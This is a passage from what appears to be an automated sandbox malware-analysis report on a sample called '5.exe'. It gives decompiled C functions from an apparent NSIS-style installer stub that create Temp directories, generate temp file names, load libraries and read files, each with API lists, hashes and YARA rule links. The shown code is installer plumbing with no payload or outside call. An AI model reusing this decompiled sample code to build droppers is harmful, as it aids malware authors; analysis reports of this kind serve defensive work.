						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                              0x00401f51
                                                                                              0x00401f51
                                                                                              0x00401f56
                                                                                              0x00401f5d
                                                                                              0x0040200b
                                                                                              0x00402156
                                                                                              0x00402156
                                                                                              0x0040287d
                                                                                              0x00402880
                                                                                              0x0040288c
                                                                                              0x0040288c
                                                                                              0x00401f6c
                                                                                              0x00401f76
                                                                                              0x00401f79
                                                                                              0x00401f88
                                                                                              0x00401f8c
                                                                                              0x00401f92
                                                                                              0x00401f96
                                                                                              0x00402004
                                                                                              0x00000000
                                                                                              0x00402004
                                                                                              0x00401f98
                                                                                              0x00401fa2
                                                                                              0x00401fa6
                                                                                              0x00401fea
                                                                                              0x00401fa8
                                                                                              0x00401fab
                                                                                              0x00401fae
                                                                                              0x00401fde
                                                                                              0x00401fb0
                                                                                              0x00401fb3
                                                                                              0x00401fbc
                                                                                              0x00401fbe
                                                                                              0x00401fbe
                                                                                              0x00401fbc
                                                                                              0x00401fae
                                                                                              0x00401ff2
                                                                                              0x00401ff9
                                                                                              0x00401ff9
                                                                                              0x00000000
                                                                                              0x00401ff2
                                                                                              0x00401f7c
                                                                                              0x00401f82
                                                                                              0x00401f86
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B694,7519EA30), ref: 00404D25
                                                                                                • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                              • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                              • String ID: B
                                                                                              • API String ID: 2987980305-3806887055
                                                                                              • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                              • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                                                                              • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                              • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E004054B2(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405449(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                              0x004015b3
                                                                                              0x004015ba
                                                                                              0x004015bd
                                                                                              0x004015c2
                                                                                              0x004015c6
                                                                                              0x004015c8
                                                                                              0x004015d0
                                                                                              0x004015d6
                                                                                              0x004015d8
                                                                                              0x004015db
                                                                                              0x004015e3
                                                                                              0x004015f0
                                                                                              0x004015fd
                                                                                              0x004015fd
                                                                                              0x004015f2
                                                                                              0x004015f3
                                                                                              0x004015fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004015fb
                                                                                              0x004015f0
                                                                                              0x00401600
                                                                                              0x00401603
                                                                                              0x00401605
                                                                                              0x00401606
                                                                                              0x004015c8
                                                                                              0x0040160d
                                                                                              0x0040162d
                                                                                              0x00402156
                                                                                              0x0040160f
                                                                                              0x00401611
                                                                                              0x0040161c
                                                                                              0x00401622
                                                                                              0x00401622
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                                • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004054C0
                                                                                                • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                                                                                • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                                                                              • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 3751793516-1943935188
                                                                                              • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                              • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                                                                              • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                              • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                              0x00405635
                                                                                              0x0040563b
                                                                                              0x0040563c
                                                                                              0x0040563c
                                                                                              0x0040563d
                                                                                              0x00405644
                                                                                              0x0040564e
                                                                                              0x0040565b
                                                                                              0x0040565e
                                                                                              0x00405666
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040566a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040566c
                                                                                              0x00000000
                                                                                              0x0040566c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405644
                                                                                              • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040565E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-881443968
                                                                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                              • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                                                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                              • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2000, Relevance: 7.7, APIs: 5, Instructions: 196fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F1F2997
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction ID: 940ece8bc827d5b6ebe452b1f4c9c40ae2b68e94af4902d2413f25fb98269230
                                                                                              • Opcode Fuzzy Hash: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction Fuzzy Hash: E4714A35E50388EADF60CBE4E911BEDB7B5BF48750F20851AE618EB2E0E7701A51DB05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401389, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 69%
                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42eb90; // 0x654724
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}












                                                                                              0x0040138a
                                                                                              0x004013fa
                                                                                              0x00401392
                                                                                              0x0040139b
                                                                                              0x004013a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004013a2
                                                                                              0x004013a3
                                                                                              0x004013ad
                                                                                              0x00000000
                                                                                              0x00401404
                                                                                              0x004013b0
                                                                                              0x004013b7
                                                                                              0x004013bd
                                                                                              0x004013be
                                                                                              0x004013c0
                                                                                              0x004013c2
                                                                                              0x004013b9
                                                                                              0x004013b9
                                                                                              0x004013ba
                                                                                              0x004013ba
                                                                                              0x004013c9
                                                                                              0x004013cb
                                                                                              0x004013f4
                                                                                              0x004013f4
                                                                                              0x004013c9
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageA.USER32 ref: 004013F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: $Ge
                                                                                              • API String ID: 3850602802-1122335547
                                                                                              • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                              • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                                                                              • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                              • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E004030AF(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405B89(_t6);
				_t2 = E0040548B(_t6);
				if(_t2 != 0) {
					E0040541E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405631("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                              0x004030b0
                                                                                              0x004030b6
                                                                                              0x004030bc
                                                                                              0x004030c3
                                                                                              0x004030c8
                                                                                              0x004030d0
                                                                                              0x004030dc
                                                                                              0x004030e2
                                                                                              0x004030c6
                                                                                              0x004030c6
                                                                                              0x004030c6

                                                                                              APIs
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 4115351271-2030658151
                                                                                              • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                              • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                                                                              • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                              • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E00405602(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                              0x00405606
                                                                                              0x00405613
                                                                                              0x00405628
                                                                                              0x0040562e

                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00405606
                                                                                              • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                              • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                              • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                              • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004055E3(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                              0x004055e7
                                                                                              0x004055f0
                                                                                              0x00000000
                                                                                              0x004055f9
                                                                                              0x004055ff

                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(?,004053EE,?,?,?), ref: 004055E7
                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                              • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                                                                              • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                              • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403066(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x0040306a
                                                                                              0x0040307d
                                                                                              0x00403085
                                                                                              0x00000000
                                                                                              0x0040308c
                                                                                              0x00000000
                                                                                              0x0040308e

                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                              • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                                                                              • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                              • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403098(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                              0x004030a6
                                                                                              0x004030ac

                                                                                              APIs
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DD2,00033FE4), ref: 004030A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                              • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                                                                              • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                              • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405449, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405449(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

